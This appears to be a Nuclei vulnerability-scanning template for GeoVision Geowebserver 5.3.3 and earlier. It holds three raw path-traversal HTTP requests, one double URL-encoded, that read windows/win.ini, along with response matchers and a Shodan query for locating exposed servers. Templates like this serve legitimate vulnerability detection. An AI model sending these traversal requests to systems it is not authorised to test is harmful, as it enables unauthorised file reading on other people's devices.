id: geovision-geowebserver-lfi-xss info: name: GeoVision Geowebserver <= 5.3.3 - Local File Inclusion / Cross-Site Scripting author: shamo0 severity: high description: | GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS, HTML Injection, and Local File Include (LFI) vectors. The application fails to properly sanitize user requests, allowing injection of HTML code and XSS, as well as client-side exploitation, including session theft. reference: - https://www.geovision.com.tw/cyber_security.php - https://www.exploit-db.com/exploits/50211 metadata: verified: true max-request: 3 shodan-query: title:"Geowebserver" tags: geovision,geowebserver,lfi,xss http: - raw: - | GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name= HTTP/1.1 Host: {{Hostname}} - | POST /Visitor/bin/WebStrings.srf?obj_name=win.ini HTTP/1.1 Host: {{Hostname}} Content-Length: 0 - | GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: - type: dsl name: lfi dsl: - 'contains_all(body, "for 16-bit", "[fonts]", "[extensions]")' - 'contains(content_type, "application/octet-stream")' - 'status_code == 200' condition: and - type: dsl name: xss dsl: - 'contains_all(body, "={\"AeDebug")' - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100b4b00823f93f7f8921092954b600647db4928dfb792713916f76c632e21d0769022100b9eba5ffcf30300eadeaedf7bce85c4e9803adbd040cfb9ee95c823f5d308ea5:922c64590222798bb761d5b6d8e72950